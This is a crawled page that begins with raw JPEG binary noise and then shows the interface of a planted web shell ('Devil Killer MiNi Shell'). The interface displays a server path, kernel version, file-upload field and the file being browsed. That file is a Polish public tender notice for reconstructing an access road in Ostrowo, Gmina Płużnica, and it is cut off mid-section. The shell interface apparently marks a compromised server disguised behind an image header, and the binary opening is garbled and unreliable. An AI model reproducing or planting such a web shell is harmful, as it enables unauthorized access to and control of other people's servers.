JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221109/0043282401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi dojazdowej do terenów inwestycyjnych w miejscowości Ostrowo - III postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Płużnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118810</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Płużnica, 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Płużnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-214</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pluznica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pluznica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi dojazdowej do terenów inwestycyjnych w miejscowości Ostrowo - III postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c1b3bf68-6061-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00432824</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00013721/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Przebudowa drogi dojazdowej do terenów inwestycyjnych w miejscowości Ostrowo - III postępowanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt RPKP.05.01.00-04-0002/18 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana <br/>informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a <br/>wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu <br/>środków komunikacji elektronicznej za pośrednictwem narzędzia miniPortal pod adresem <br/>https://miniportal.uzp.gov.pl/. Przez środki komunikacji elektronicznej rozumie się środki <br/>komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług <br/>drogą elektroniczną (Dz. U. z 2020 r. poz. 344).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 <br/>grudnia 2020r. w sprawie sporządzania i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o <br/>udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz.2452) określa niezbędne <br/>wymagania sprzętowo – aplikacyjne umożliwiające działanie na miniPortalu:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min.2 GB Ram, procesor <br/>Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 8, <br/>Mac Os x 10,4, Linux lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer <br/>minimalna wersja 10 0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf;<br/>f) miniPortal działa według standardu przyjętego w komunikacji sieciowej – kodowanie <br/>UTF8.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma <br/>dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub <br/>wniosku” oraz do „Formularza do komunikacji”. Maksymalny rozmiar plików przesyłanych za <br/>pośrednictwem dedykowanych formularzy wynosi 150 MB, natomiast przy komunikacji wielkość<br/>pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE, (Dz. U. UE. L. z 2016 r. Nr 119, str. 1; zm.: Dz. U. UE. L. z 2018 r. Nr <br/>127, str. 2.), zwanego jako ,,RODO&#34; informujemy:<br/>Administrator danych osobowych Wójt Gminy Płużnica. Możesz się z nim kontaktować <br/>w następujący sposób: listownie na adres siedziby: Urząd Gminy w Płużnicy, Płużnica 60, <br/>87 - 214 Płużnica, e-mail: sekretariat@pluznica.pl, telefonicznie 56/ 687 52 15.<br/>Do kontaktów w sprawie ochrony danych osobowych został także powołany inspektor ochrony <br/>danych, z którym możesz się kontaktować wysyłając e-mail na adres iod@pluznica.pl<br/>1. Twoje dane osobowe przetwarzane będą na podstawie:<br/>1) art. 6 ust. 1 lit c), art. 9 ust. 2 lit. g) i art. 10 RODO, w związku z ustawą z dnia 11 września <br/>2019 r. Prawo zamówień publicznych i instrukcją udzielania zamówień publicznych, w celu <br/>realizacji obowiązku prawnego ciążącego na administratorze tj. udzielenia zamówienia <br/>publicznego,<br/>2) art. 6 ust. 1 lit b) RODO, w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień <br/>publicznych i instrukcją udzielania zamówień publicznych, w celu wykonania umowy, której <br/>stroną jest osoba, której dane dotyczą tj. zawarcie odpłatnej umowy zawieranej między <br/>zamawiającym a wykonawcą, której przedmiotem jest usługa, dostawa lub robota budowlana <br/>(też umowa o podwykonawstwo),<br/>3) art. 6 ust. 1 lit a) RODO na podstawie zgody. Zgoda jest wymagana, gdy uprawnienie do <br/>przetwarzania danych osobowych nie wynika wprost z przepisów prawa, a przekażesz <br/>administratorowi z własnej inicjatywy więcej danych niż jest to konieczne dla załatwienia <br/>Twojej sprawy (tzw. działanie wyraźnie potwierdzające) np. podanie nr telefonu, adresu e mail i inne.<br/>2. Twoje dane osobowe możemy ujawniać, przekazywać i udostępniać wyłącznie podmiotom <br/>uprawnionym na podstawie obowiązujących przepisów prawa są nimi m.in. wykonawcy, <br/>podmioty świadczące usługi pocztowe, bankowe, telekomunikacyjne oraz inne podmioty, <br/>gdy wystąpią z takim żądaniem oczywiście w oparciu o stosowną podstawę prawną. <br/>Pracownikom oraz współpracownikom administratora.<br/>3. Twoje dane osobowe możemy także przekazywać podmiotom, które przetwarzają je na <br/>zlecenie administratora tzw. podmiotom przetwarzającym, są nimi m.in. podmioty <br/>świadczące usługi informatyczne i inne jednakże przekazanie Twoich danych nastąpić może <br/>tylko wtedy, gdy zapewnią one odpowiednią ochronę Twoich praw.<br/>4. Twoje dane osobowe przetwarzane będą do czasu istnienia podstawy do ich przetwarzania, <br/>w tym również przez okres przewidziany w przepisach dotyczących przechowywania i <br/>archiwizacji dokumentacji i tak:<br/>1) przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>2) jeżeli czas trwania umowy przekracza 4 lata, przez czas trwania umowy, do czasu <br/>przedawnienia roszczeń,<br/>3) w zakresie danych, gdzie wyraziłeś zgodę na ich przetwarzanie, do czasu cofnięcie zgody, <br/>nie dłużej jednak niż do czasu wskazanego w pkt 1</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W związku z przetwarzaniem danych osobowych przez Administratora mają Państwo prawo <br/>do:<br/>1) dostępu do treści danych, jednakże jeżeli spełnienie obowiązku prawa dostępu do danych <br/>osobie której dane dotyczą, wymagałoby niewspółmiernie dużego wysiłku, zamawiający <br/>może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na <br/>celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o <br/>udzielenie zamówienia publicznego lub konkursu,<br/>2) sprostowania danych,<br/>3) usunięcia danych, jeżeli:<br/>a) wycofają zgodę na przetwarzanie danych osobowych,<br/>b) dane osobowe przestaną być niezbędne do celów, dla których zostały zebrane lub dla <br/>których były przetwarzane,<br/>c) dane są przetwarzane niezgodnie z prawem.<br/>4) ograniczenia przetwarzania danych, jeżeli:<br/>a) osoba, której dane dotyczą, kwestionuje prawidłowość danych osobowych,<br/>b) przetwarzanie jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się <br/>usunięciu danych osobowych, żądając w zamian ograniczenia ich wykorzystywania,<br/>c) administrator nie potrzebuje już danych osobowych do celów przetwarzania, ale są one <br/>potrzebne osobie, której dane dotyczą, do ustalenia, dochodzenia lub obrony roszczeń,<br/>d) osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania – do czasu stwierdzenia, <br/>czy prawnie uzasadnione podstawy po stronie administratora są nadrzędne wobec podstaw <br/>sprzeciwu osoby, której dane dotyczą. Wystąpienie osoby z żądaniem ograniczenia <br/>przetwarzania danych nie ogranicza przetwarzania danych osobowych do czasu <br/>zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>5) cofnięcia zgody w dowolnym momencie. Cofnięcie zgody nie wpływa na przetwarzanie <br/>danych dokonywane przez administratora przed jej cofnięciem.<br/>6. Podanie Twoich danych:<br/>1) jest wymogiem ustawy na podstawie, których działa administrator. Jeżeli odmówisz podania <br/>Twoich danych lub podasz nieprawidłowe dane, administrator nie będzie mógł zrealizować <br/>celu do jakiego zobowiązują go przepisy prawa,<br/>2) jest wymogiem umownym. Jeżeli nie podasz nam swoich danych osobowych nie będziemy <br/>mogli podpisać i realizować z Tobą umowy,<br/>3) jest dobrowolne w zakresie zgody, która może być cofnięta w dowolnym momencie.<br/>7. Przysługuje Ci także skarga do organu nadzorczego - Prezesa Urzędu Ochrony Danych <br/>Osobowych - Warszawa ul. Stawki 2, gdy uznasz, iż przetwarzanie Twoich danych <br/>osobowych narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia <br/>27 kwietnia 2016 r.<br/>8. Dane nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym również w formie <br/>profilowania<br/>9. Administrator nie przekazuje danych osobowych do państwa trzeciego lub organizacji <br/>międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GPI.271.31.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na przebudowie drogi dojazdowej <br/>do terenów inwestycyjnych w miejscowości Ostrowo. Zakres prac obejmuje w szczególności:<br/>1) Roboty przygotowawcze;<br/>2) Roboty rozbiórkowe;<br/>3) Wykopy;<br/>4) Nasypy;<br/>5) Profilowanie i zagęszczanie podłoża;<br/>6) Oczyszczenie i skropienie;<br/>7) Podbudowy z mieszanki kruszywa niezwiązanego;<br/>8) Podbudowy i ulepszone podłoża stabilizowane hydraulicznie;<br/>9) Nawierzchnie z betonu asfaltowego;<br/>10) Nawierzchnia z betonowej kostki brukowej;<br/>11) Zabezpieczenie nawierzchni asfaltowej przed spękaniami odbitymi;<br/>12) Roboty wykończeniowe;<br/>13) Oznakowanie poziome i pionowe;<br/>14) Oświetlenie uliczne;<br/>15) Chodniki;<br/>16) Zieleń drogowa.<br/>3.Szczegółowy opis przedmiotu zamówienia zawarty jest w załączonych ( Załącznik nr 1) do SWZ <br/>następujących dokumentach:<br/>1) Przedmiar robót;<br/>2) Przekroje;<br/>3) Specyfikacja Techniczna Wykonania i Odbioru Robót;<br/>4) BIOZ;<br/>5) Organizacja ruchu;<br/>6) Opis Techniczny;<br/>Zamawiający informuje, że mimo iż w wyżej wymienionych dokumentach mowa jest o <br/>wykonaniu odcinka próbnego, odcinek próbny nie wchodzi w skład przedmiotu zamówienia i <br/>nie należy go uwzględniać przy obliczaniu ceny ofertowej. W przypadku rozbieżności w <br/>zapisach pomiędzy przedmiarem a innymi z wyżej wymienionych dokumentów, pierwszeństwo <br/>mają zapisy przedmiaru. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233292-2 - Instalowanie urządzeń ochronnych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami <br/>oceny ofert:<br/>1) Cena (C) –– waga kryterium 60 %;<br/>2) Gwarancja ( G ) – waga kryterium 40 %.<br/> Cena (C) – waga 60 %<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60 %<br/>cena oferty ocenianej brutto<br/><br/>Minimalny okres gwarancji wynosi 3 lata licząc od dnia podpisania ostatecznego protokołu <br/>odbioru robót. <br/>Wykonawca, który zaoferuje 3 letni okres gwarancji w kryterium Gwarancja otrzyma 0 pkt.<br/>Wykonawca, który zaoferuje 4 letni okres gwarancji w kryterium Gwarancja otrzyma 20 pkt.<br/>Wykonawca, który zaoferuje 5 letni okres gwarancji w kryterium Gwarancja otrzyma 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na <br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego <br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) posiada wiedzę i doświadczenie<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem <br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie <br/>należycie wykonał (tj. w szczególności wykonał zgodnie z przepisami prawa budowlanego i <br/>prawidłowo ukończył) minimum 1 robotę budowlaną polegającą na budowie, przebudowie, <br/>rozbudowie, remoncie drogi, o nawierzchni z betonu asfaltowego o wartości roboty nie <br/>mniejszej niż 800 000,00 zł brutto lub 2 roboty budowlane polegające na budowie, <br/>przebudowie, rozbudowie, remoncie drogi o nawierzchni bitumicznej o łącznej wartości obu <br/>robót nie mniejszej niż 800 000,00 zł brutto.<br/>b) Dysponuje osobami zdolnymi do wykonania zamówienia:<br/>skieruje do realizacji niniejszego zamówienia co najmniej Kierownika Budowy <br/>posiadającego wykształcenie techniczne i uprawnienia do wykonywania samodzielnych <br/>funkcji w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst <br/>jedn.: Dz. U. z 2019 poz. 1186 z późn. zm.) do kierowania robotami w specjalności <br/>drogowej lub równoważne im ważne uprawnienia wydane według wcześniejszych <br/>przepisów w wymaganej specjalności dla prowadzonych robót. Zamawiający dopuszcza <br/>uprawnienia wydane za granicą zgodnie z przepisami o uznawaniu kwalifikacji <br/>zawodowych.<br/>1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których<br/>zachodzi którakolwiek z okoliczności wskazanych w art. 108 ust. 1 Pzp.;<br/>2. Wykluczenie Wykonawcy następuje zgodnie z art. 111 Pzp. <br/>3. Zgodnie z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa <br/>narodowego ( Dz. 2022.835), dalej zwaną USTAWĄ, z postępowania o udzielenie zamówienia <br/>publicznego wyklucza się, wykonawców, o jakich mowa w art. 7 ust. 1 USTAWY. Wykluczenie <br/>następuje na okres trwania okoliczności określonych w art. 7 ust. 1. USTAWY. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do <br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/>konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył <br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, <br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do <br/>tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych 